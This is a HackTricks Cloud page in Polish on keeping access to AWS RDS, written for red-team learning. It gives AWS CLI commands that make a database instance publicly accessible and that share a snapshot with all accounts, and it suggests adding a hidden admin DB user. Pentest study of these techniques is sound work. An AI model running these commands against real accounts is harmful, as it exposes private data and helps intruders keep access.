HackTricks CloudAWS - RDS Utrzymanie dostępu
Tip
Ucz się & ćwicz AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Wspieraj HackTricks
- Sprawdź subscription plans!
- Dołącz do 💬 Discord group lub telegram group lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się hacking tricks, zgłaszając PRy do HackTricks i HackTricks Cloud github repos.
RDS
Więcej informacji:
AWS - Relational Database (RDS) Enum
Uczynienie instancji publicznie dostępną: rds:ModifyDBInstance
Atakujący z tym uprawnieniem może zmodyfikować istniejącą instancję RDS, aby włączyć dostęp publiczny.
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
Utwórz użytkownika admina w DB
Atakujący może po prostu utworzyć użytkownika w DB, dzięki czemu nawet jeśli hasło konta master zostanie zmienione, nie straci dostępu do bazy danych.
Uczyń snapshot publicznym
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
Tip
Ucz się & ćwicz AWS Hacking:
Ucz się & ćwicz GCP Hacking:
Ucz się & ćwicz Az Hacking:Wspieraj HackTricks
- Sprawdź subscription plans!
- Dołącz do 💬 Discord group lub telegram group lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się hacking tricks, zgłaszając PRy do HackTricks i HackTricks Cloud github repos.